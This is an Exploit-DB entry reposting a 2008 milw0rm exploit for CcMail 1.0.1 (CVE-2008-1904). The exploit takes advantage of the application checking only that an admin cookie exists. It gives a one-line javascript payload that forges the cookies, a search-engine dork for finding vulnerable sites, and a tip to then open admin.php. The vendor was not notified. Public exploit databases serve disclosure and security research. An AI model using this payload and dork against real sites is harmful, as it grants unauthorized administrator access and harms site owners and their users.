CcMail 1.0.1 - Insecure Cookie Handling

EDB-ID:

5433

CVE:

2008-1904

EDB Verified:

Author:

t0pP8uZz

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2008-04-12

Vulnerable App:

--==+================================================================================+==--
--==+		         CcMail <= 1.0.1 Insecure Cookie Handling	             +==--
--==+================================================================================+==--



Discovered By: t0pP8uZz
Discovered On: 11 April 2008
Script Download: http://www.cicoandcico.com/download/download.php?SortBy=1&fdir=./ccmail/
DORK: "Emanuele Guadagnoli" "CcMail"

Vendor Has Not Been Notified!


DESCRIPTION: 
CcMail (all versions) suffers from insecure cookie handling, this allows the remote attacker to set a cookie
and be granted access to the admin area. this is because CcMail only checks if the cookie exists, it doesnt
compare the data.

by entering the below javascript into your (firefox/thunderbird etc) cookies will be created allowing you
to login to "admin.php"


Exploit:

javascript:document.cookie = "name=admin; path=/;"; document.cookie = "this_cookie=admin; path=/;"; 



NOTE/TIP: 
after running the above code you will be able to visit the admin area at "admin.php"


GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !


--==+================================================================================+==--
--==+		         CcMail <= 1.0.1 Insecure Cookie Handling	             +==--
--==+================================================================================+==--

# milw0rm.com [2008-04-12]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services